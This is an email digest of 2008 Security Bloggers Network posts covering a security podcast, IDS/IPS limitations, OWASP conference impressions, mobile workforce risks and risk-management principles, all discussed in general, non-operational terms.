Posted: 29 Sep 2008 07:31 AM CDT
Mitchell and I are joined this week by Bill Brenner. Bill is the senior editor at CSO Online. We have been trying to get him on as a guest since he was with searchsecurity.com! Bill talks mostly about how the current economic crisis might effect the security industry. We also talk about the life of a security journalist and what is the next big thing in security. The interview with Bill does not come on until around 17 minutes in. Mitchell and I first talk about a mess of things including Apple, Green NAC (but not Green Apples), M&A in security, etc. Its good to be doing these podcasts regularly again. Hope you enjoy it! If you have any questions, write to us at email@example.com.
Thanks to Pod0matic for hosting our podcast. Tonight's music is the usual, To the Summit by Jon Schmidt. You can hear more from Jon at http://www.jonschmidt.com. Music transitions between segments are by our own Mitchell Ashley!
Enjoy the podcast!
This posting includes an audio/video/photo media file: Download Now
Posted: 29 Sep 2008 01:28 AM CDT
Image via Wikipedia
That skit Jew or not a Jew, on Saturday Night Live was hysterical. Tom Hanks was the guest host and he plays a game show host in a game where contestants guess whether a particular celebrity is Jewish or not. It is brought to you by Feldmans Pickles, "you don't have to be Jewish to like Feldmans, but it helps"
I feel the same way every football season. For whatever reason, my site must be highly listed when you search on whether Ben Roethlisberger is Jewish or not. I just can't believe that so many people actually take the time to search for this. It is always one of the top three search terms of visitors to the blog during football season. But if you have come to this article as a result of the search, let me say for sure: Ben Roethlisberger - Not a Jew!
To all my of Jewish friends who observe the holidays, Happy and Healthy New Year to you!
Posted: 28 Sep 2008 11:14 PM CDT
Posted: 28 Sep 2008 10:27 PM CDT
Posted: 28 Sep 2008 10:19 PM CDT
Posted: 28 Sep 2008 10:15 PM CDT
Posted: 28 Sep 2008 10:49 AM CDT
Came across a story today noting the Commonwealth of Virginia (and I bet you thought it was a state) was awarded top honors for information security by the National Association of State Chief Information Officers (NASCIO). It seems Virginia's "Interlocking Spheres of Collaborative Protection" program "strengthens the security of sensitive citizen information across all branches of government". I tried to find out a bit more about these interlocking spheres, but have not been able to find anything. I have dealt with some county governments in Virginia and will reach out to see if I can dig in a bit.
Overall though state and local government faces the same challenges that our Federal government has and many commercial entities. Protecting confidential information is a challenge. But Government also has to have some transparency and a duty to make certain information available. Balancing those two requirements is a difficult task.
State government IT departments have very much of a coop-a-tive relationship with each other. Each one wants to be the best at IT in general and security in particular. Yet, when one state is successful with a particular technology, many other states will seek to imitate that same technology or technique. I am sure that we will see other states adopt the Interlocking spheres program soon. No matter what it is exactly ;-)
Posted: 28 Sep 2008 10:01 AM CDT
Posted: 27 Sep 2008 05:32 PM CDT
In May of this year I sent an email to Peter MacKay, Canada’s Minister of National Defence, to enquire about Canada’s involvement in the NATO Cooperative Cyber Defence (CCD) Centre of Excellence (COE):
With Canada’s history of long history of NATO involvement I would have thought Canada would have jumped at the opportunity to participate. If asked by my government I would have also jumped at the opportunity. Alas, my country does not want to be involved in this particular project:
This is truly a shame. This was an opportunity for Canada to participate in a NATO initiative that meant something more than large meetings and mass naval maneuvers in the Caribbean. For shame Canada…am I the only one who regards the proliferation of cyber attack capabilities as a threat to national security?
Posted: 27 Sep 2008 04:25 AM CDT
I read two blog pieces about IDS/IPS, here and here, and decided to throw a few comments into the blog discussions. This is just my point of view to the topic.
Alan noted that organizations are not using the IPS functionality and only monitor the traffic to detect events. I believe this is for the risk of blocking legitimate traffic that happens to trigger a signature, resulting in a false positive and possibly disrupting an important transaction.
He also noted that organizations do not update their signatures. I would say that in such cases they do not monitor and validate the events either, just throw the box in a network location and leave it there running to do its "job". Too bad an IDS requires constant monitoring and updating as it is signature-based like antivirus products. Either it is the "checkbox" culture or they do not know what to do, that they do not have the proper processes in place.
Ravi on the other hand noted that it is a difficult job to get the value out of IDS because of the sheer amount of events, that it is difficult to see through the noise. In my opinion that problem should be tackled with careful placing of the IDS and by tuning the IDS to suit the environment you're trying to monitor. Sure, you probably will miss a lot of attack related activity, but you will spot attacks that are specifically targeting the technologies you have. This is also where the placement of the box or boxes become important. What do you actually want to monitor? Do you benefit from the IDS in the first place?
As I already mentioned, you should have processes in place, more specifically management processes and incident response processes. One admin looking at the logs in the morning and afternoon is not enough, you actually need a team of guys monitoring the devices for 24/7 if you want to benefit from the technology and an actual response plan. The admin should just ensure the boxes are healthy and up-to-date.
What struck me the most of these both blog posts was the mentioning of zero day attacks. You simply can't detect zero day attacks unless it has characteristics that get detected by an old signature. What they probably meant were the latest publicly announced vulnerabilities for which vendors scramble to produce signatures if either the exploit exists or there is a clear characteristics seen in a vulnerable service request or response.
Also another point is that skillful attackers are able to evade IDS detection either by exploiting IDS caveats or modifying the exploits to act in a little bit different way. Attack traffic can also look perfectly normal because the attacker is using normal operating system commands that are not considered suspicious. Many services also utilize encryption (HTTPS, SSH, anyone?), so IDS is blind unless the encryption is off-loaded and IDS positioned to a place where it has access to the cleartext data. In some cases not understanding this can lead to a false sense of security. This requires an organization to also monitor server logs and overall system integrity, to have proper vulnerability management and hardening processes in place.
There is a lot more that simply can't be covered, but I end this blog post by saying that an IDS/IPS is not a silver bullet and should not be solely relied upon.
Posted: 26 Sep 2008 08:51 PM CDT
Living in NYC has its perks, one being that we host the largest OWASP chapter across the world. The NY/NJ Metro chapter put a lot of effort into making sure this last week went smoothly, even with the change of venues at the last minute. I had a lot of fun, and it was nice seeing everyone again, and meeting new faces. On Wednesday night, a bunch of us gathered for a NYSec meeting at DBA down on 1st Ave and 2nd St. Some cool new people I got to meet included Andres Riancho, Dinis Cruz, Ryan Naraine, Ivan Ristić, Dave Aitel, RSnake, Chris Nickerson, and Gunnar Peterson… phew! That is not even a fraction of the people you get to see at these conferences.
Anyways, my two favorite talks go to Dinis Cruz and Dave Aitel. Firstly, Dinis is such an energetic guy, you just want to stand up, do the guido fist pump and then run off to do something really, really cool. As an independent contractor working for Ounce, Dinis developed an open source tool called o2 which helps code reviewers navigate mountains of static analysis data quickly and logically. Of the couple static analysis tools I’ve come across, their interfaces don’t exactly cater to performing thorough, quick and accurate analysis. What o2 let’s you do, is crank up the volume on these tools and just run with it, identifying patterns in code really easily, letting you cover as much as possible. I still have to spend some time playing with it, but it definitely would make anyone’s job easier. All that, and it’s open sourced and will read in any CIR data from an Ounce scan.
Dave’s talk, “Corruption” really captured my sentiments on non-webappsec research (present day). While in university, I always thought the barrier to entry prohibited a lot of people from becoming really good at writing reliable buffer overflow exploits. This could be seen as both good and bad, given the fact that many operating systems have randomized, non-executable memory stacks with Vista ASLR, XP SP2 DEP, PaX/Grsecurity, etc, making them somewhat immune to the vulnerability, but not 100% entirely. This presents a problem, a huge gaping vulnerability in both our systems and our thinking. Buffer overflows continue to surface even after being discovered 15 years ago. But because it is so hard, we don’t see many exploits on milw0rm or packetstorm. And let’s face it, if they’re not on there, then they don’t exist. Right? Maybe. Though one thing is certain, the people writing exploits are professionals and are really, really good at what they do. Be it Dino, Gobbles or Aitel (who was being modest when he said he’s not the best), it is true there are people out there who can and will do it, and when the next remotely exploitable buffer overflow that bypasses stack protection comes along, we won’t know what fucking hit us.
Also, we’ve begun to set the agenda for OWASP EU Summit Portugal. Arshan Dabirsiaghi is looking for folks to contribute to ISWG, a group with some modest goals, like fixing the Internet. Seriously though, the group is looking at new ways to secure the browser, and what approach(es) they’ll take to do it. I’d love to talk about some other projects, but really, there are just too many worthy projects to list all out here, so head on over to the OWASP EU Summit page, and find something of interest.
One last closing thought I’d like to squeeze in… Throughout the entire week, I found it really coincidental that ISC2 chose to sponsor the OWASP conference and release a new certification, the CSSLP (Certified Software Security Lifecycle Professional). Given that James McGovern is putting a lot of effort into developing an OWASP certification, Dre posting R.I.P. CISSP and getting in the top 5 Google search results for “CISSP”, I find it strangely odd they go and do this. It also seems as if they put no thought into the certification at all, just one they cranked out to beat OWASP “to the punch” and make a buck at the industry’s expense, laughing all the way to the bank. Shameful.
Posted: 26 Sep 2008 12:57 PM CDT
For those of you who haven't heard already, friend of the show, Michael Santarcangelo (The Security Catalyst) had his mobile home robbed while he's on US tour with his family taking his security messages on the road. The thieves made off with his computing gear. I have to say that he's been very upfront about his predicament so that we can all learn from his situation; He did lose some data, but for the most part his backup and disaster recovery plan went well. He's deriving a great amount of inspiration for some more security training out of this as well. I have to applaud him on taking some lemons and making lemonade.
I have to admit that the incident has inspired me as well. It got me thinking about some possible issues with mobile workforces. I mean, we all (for the most part) do a pretty good job of securing our assets while they are in our corporate environment; Whole disk encryption, AV, Desktop and Network firewalls...the list goes on. We also have those locked doors, a security guard, alarm system and so forth.
But what happens when someone takes (with permission) that asset, such as a laptop, home to do some work in the evenings, work from home, or visit client sites? What do the employees have for protection? Do they have a network firewall, or do they plug directly in to their cable modem? Do they have a security guard (dog or alarm system at that)? Typically no. Unsecured wireless? Yikes, all of the same things that we've thought about as challenges in the corporate environment, we have think think about "on the road" I see these as some potential issues for security for both data on the machine, as well as a possible connection to the corporate network.
Let's set the scene. Intellectual property gets loaded on to a laptop with fill disk encryption. The employee takes the laptop home to telecommute (which is a regular occurrence), connects the laptop to the home network and initiates the VPN connection (with cached VPN credentials possibly) to the corporate network. the employee decides to take a breath of fresh air with a trip to the local coffee shop for an invigorating mocha-chino. While away form home, a burglar (or attacker in this case) breaks in and has a few minutes to play on the VPN, and so forth. Without full disk encryption, this situation looks like a disaster to me.
So, you are asking, how does the attacker find where the "target" lives to break in? A little Google searching (and maybe even some Maltego action), could turn up a photo sharing service account for the "target". Combine that with a Nokia N95 or iPhone with firmware 2.0 or later, and some nice, geotagged photos get uploaded (such as the one to the right, with output from a nice Firefox greasemonkey script to pull map info from google). Now you know where to search...
Protect your corporate assets on the move! It is hard to make unreasonable requirements of folks at home, so a little education needs to go a long way. Make those corporate assets as secure as possible, and design a policy framework that will appropriateley guard against the high risk areas; include screen saver locking with a short delay, workstation login timeouts, whole disk encryption, VPN activity timeouts and maybe even a good cable lock for good measure, amongst a myriad of other things.
Educate staff about what they share on the internet; in most cases it would be in bad form to restrict what folks do in their spare time.
Best of luck securing your mobile workforce, and Michael, best of luck to you and your family recovering from your ordeal.
- Larry "haxorthematrix" Pesce
Posted: 26 Sep 2008 09:08 AM CDT
Posted: 26 Sep 2008 07:56 AM CDT
We’re frequently asked what we’re reading and what we like in blog posts, so here are some interesting things that hit our RSS readers that you may have missed:
Interesting stuff that. A detailed mapping might help some folks. Either way, the good news for those keen on understanding risk management is that governance metrics, done right, allow us to understand a part of that “capability to manage risk” we’re always looking for. Assurance, verification and the acquisition and interpretation of knowledge is king. Speaking of which….
Good analysis is all about the uncertainty. Speaking of accounting for uncertainty…
And there’s the trick. We might call “abstraction assurance” an analog to “confidence” or “uncertainty” in certain priors (metrics) or posteriors (calculated values based on those metrics). The stronger that abstraction assurance is, the less uncertainty we have in our knowledge and the better our ability to create wisdom from that knowledge (you know, make decisions).
Adam’s focus is on software security, but the discussion here can be abstracted out into the broader realm of risk management quite nicely.
The US DoJ says that in 2005 (there’s some timely data) 2/3 of their surveyed firms detected at least one cybercrime. “Cybercrime” is “classified … into cyber attacks, cyber theft, and other incidents.” Pretty general. Also from the report: “Computer viruses made up more than half of all cyber attacks.”
(That sound you hear is me tapping my forehead lightly on large iron object)
Posted: 25 Sep 2008 08:08 PM CDT
Posted: 25 Sep 2008 02:29 PM CDT
Posted: 25 Sep 2008 01:15 PM CDT
We're doing things a little different tonight. We'll be breaking ths show up in to two parts.
The live stream for the news portion of the show should be active about 5:00 PM EDT, Thursday, September 25th. We should begin recording the live show at about 5:10 PM EDT.
We even have a very special guest again this week, Alex Horan from Core Security Technologies (and some other distinguished guests from Core). The stream should be live at about 8:45 PM EDT and we'll begin the interview at about 9:00 PM EDT.
Please keep in mind that these times are all estimates, but we will try to do the best that we can.
Don't forget to join in on the IRC channel during the stream - we can take live comments and discussion from the channel! Find us on IRC at irc.freenode.net #pauldotcom.
When active, the live stream(s) can be found at:
Please join us, and thanks for listening!
- Larry & Paul
Posted: 25 Sep 2008 10:54 AM CDT
The US PCI Conference is now over, and what a quick two days. There are many changes coming for the new standard, and I'm very excited about talking to you all. We are putting together a webinar to discuss, in detail, the changes that you will be facing. Look for an announcement on that soon.
It was great talking with many of you about the issues that we all face every day. I look forward to talking again soon and helping you build creative solutions to these challenges.
Oh, and a quick tidbit for you all. If you get a business card from a processor, sometimes even when you put it in a blazing fire pit, it will not burn!
Posted: 25 Sep 2008 10:51 AM CDT
I was interviewed yesterday morning for WNIN 88.3 FM in Evansville to talk about how Sarah Palin’s account got hacked and how it affects the average user. I thought the interview went well and I didn’t sound like too much of an idiot. You can listen for yourself, it’s now been published as part of the third episode of Plugged In, the podcast that accompanies the radio show.
Posted: 25 Sep 2008 09:43 AM CDT
In part one we talked about some of the mistakes that companies make when it comes to risk management. In this post we will focus on some of the items that a company can do to improve their risk management programs. What I will lay out are three points/characteristics/aspects that a solid risk management program must have in order to be effective.
Point One: A common risk framework must exist throughout the organization, not just within one department. This framework must:
· Use a common definition for "risk;"
· Support appropriate standards, regulations, guidelines;
· Clearly define the key roles, responsibilities, and authority relating to risk management;
· Support all of the business units and functions both in the way that these units accomplish their jobs as well as in the performance of their risk responsibilities.
Many organizations recognize that risk means "the chance of something going wrong, hazard, statistical odds of danger" to quote the Encarta Dictionary. What they forget is that there are positive aspects to risk. Risk can be seen as the opportunity to create and preserve value.
When I think of risk in this way an old saying comes to mind:
"When Life gives you Lemons, make Lemonade."
In other words you need to create opportunity out of adversity. Business is about risk. There is no way to avoid it so why not simply seek to nullify its effects when you can leverage it to gain an advantage. In my experience, the companies that embrace this concept of managing risk succeed not only in risk management but in the marketplace itself.
Point Two: Senior management must have the primary responsibility for the risk management program. This means its design (it must be appropriate for the whole organization), its implementation (it must not favor one unit or function over another), and its ongoing operation. Most importantly senior management must have complete visibility into how the organization (and each of its constituent components/units) manages risk.
This means that risk must be coordinated across the entire organization. Risk must be everyone's responsibility; even those people who do not think they have any responsibilities with regard to risk. True implementing technical security controls may be the primary responsibility of the IT department but in order for that implementation to be successful all departments and functions must share the responsibility. IT needs to know if a particular control causes too much interference with the way the business is run so that they can make adjustments or implement alternative controls to reduce interference to a minimum. The other departments and functions must realize that there are valid business reasons that these controls must be implemented.
Senior Management needs to send the message that risk is a collective concern. In order to do Senior Management needs to ensure that they communicate clearly and effectively. They need to nurture a culture focused on risk (how to manage it and overcome it for the organizations benefit). They need to institute a rewards program to provide positive reinforcement and they need to institute an effective learning program to educate everyone on what parts they play in the grand scheme of things.
Point Three: Risk is an everyday concern and on every agenda not just on certain scheduled meetings. Each business units/function is responsible for the performance of not only their business and the management of risks they take. This is important because it speaks to ownership and accountability.
Not everyone is going to like this. Honestly they don't have to but they do have to climb on board and support the effort. It is analogous to having to abide by the covenants in your homeowners association. If you move into a neighborhood with a home owners association, then you agree to abide by the rules that the association agrees upon. If you don't want to do that then there are other homes that are not part of associations just as there are other companies to work in. (Of course there are always rules set forth by the local, state, and a national government that we must abide by – that is part of living in an ordered society. )
Now not all business units or functions have the same scope when it comes to risk. Some departments "own" risk management because they are the profit generating arms of the organization and other departments (such as HR, IT, finance, legal, etc) support these profit generating arms. These supporting functions own the risk that arises out of their own area of responsibility in addition to sharing in the overall responsibility of supporting the overall organization. It is very important (to harken back to Point One) that these functions have well defined articulated roles within the overall risk management program. They must participate in risk discussions even when it is not clear that these discussions are directly related to them.
I could go on but this post is getting a bit long already. To sum everything up – risk is everyone's responsibility. Companies trade risk for reward daily so it shouldn't be too large a leap to remind ourselves that the risks we face on a daily basis need not only be seen as a drag on the balance sheet. They can be seen as opportunities to be leveraged. Instituting a risk management program that pays attention to the three points that I have made above will do just that.
|You are subscribed to email updates from Security Bloggers Network |
To stop receiving these emails, you may unsubscribe now.
|Email Delivery powered by FeedBurner|
|Inbox too full? Subscribe to the feed version of Security Bloggers Network in a feed reader.|
|If you prefer to unsubscribe via postal mail, write to: Security Bloggers Network, c/o FeedBurner, 20 W Kinzie, 9th Floor, Chicago IL USA 60610|